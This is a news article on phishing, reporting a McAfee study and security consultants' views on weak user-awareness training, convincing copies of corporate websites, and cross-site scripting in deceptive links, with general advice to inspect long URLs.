IT professionals may want to give their staff a refresher course on phishing attacks.
In a recent study, McAfee outlined the increasingly persuasive nature of phish attacks and the psychological “mind games” that cyber criminals use to trick their prey. The study said scammers play up to users’ emotions, using fear, greed and lust to ultimately steal personal and proprietary financial information. McAfee found the most important key to an Internet scammers’ success is creating the illusion of legitimacy and familiarity.
“The technique we’ve seen the most is mimicking another organization’s e-mail,” Jean Pascal Hebert, an account manager at McAfee, said. “Typically these are the most successful types of attack and can entice an individual to release information they should not be releasing.”
Hebert said that more education is needed to combat these sophisticated attacks, but some security experts say this will take a major change in the training process to succeed.
Rohit Sethi, manager of Security Compass, said that most IT managers have failed to provide interactive training to their staff in order to help them understand the fundamentals of phish attacks.
“A lot of times what you’ll have in an organization is an IT professional who understands the subject matter expertly, but they don’t have an understanding of how to train properly,” Sethi said. “So they’ll stand in front of their users and say – ‘don’t do this and don’t do that’ – and a lot of times users won’t pick up on it.”
Sethi said that traditional training strategies neglect to demonstrate how a user’s computer can be compromised and why the data leak occurs. He said that taking the time to develop this base understanding will allow users to apply their knowledge and adapt to future phishing attempts.
“A lot of companies will use a checklist approach, where you have somebody trained and, therefore, they can sign off and say that they’re trained,” Sethi said. “It follows policy, but they don’t really end up measuring the effectiveness of the training, so we’ll see a lot of [IT managers] frustrated with the effectiveness of their training and user awareness.”
Sahba Kazerooni, security consultant at Security Compass, sees most training policies as a substitute for competence, and in turn, makes users increasingly ineffective to changing phishing attacks.
“A SANS Institute top 20 list of vulnerabilities that effect Internet security, now has users listed as a threat for the first time,” Kazerooni said. “This has kind of led to the whole idea of phishing, all of a sudden, being a much bigger threat than it has been in previous years and users becoming a much bigger threat to IT security.”
Hebert agreed, saying that IT managers should take the time to develop internal campaigns to teach their users. He also said that implantation McAfee’s free SiteAdvisor tool, which flags potential danger sites, is one of the first steps that companies should take to help “lock the front door.”
And while Hebert said users are not falling for e-mail spam as often as they used to, phishing sites which emulate corporate Web sites are often successful in tricking them.
“The first [phishing sites] we saw a few years ago were full of typos and bad art,” Hebert said. “But nowadays you see a complete mimic of corporate identities and the language it utilizes is often flawless.” Even more advanced, according to Sehti, is cross-site scripting techniques, which exploit holes in Web applications. This means that a user can see a link that appears to be from a legitimate Web site, however, because of a code vunerbility in the site, users can be exposed to a phishing attack if they follow the link.
For example, if this was done at an online bank, users could have their username, password, and account information logged without suspicion. “This is the kind of area that is lacking in general user awareness training, so a lot of times people even general security people don’t know about cross-site scripting,” Sethi said.
Until better tools exist to defend against this type of attack, security experts say users should be cautious of long URLs because of they may include a harmful script tag. This is something that could go unnoticed by even the most computer-savvy users.
“If you want to click on the link, copy and paste the link into your web browser and look at it,” Sehti said. “This may be verging on paranoia, but to be really sure you may want to try to go to the main site in question and get to the particular desired area manually.”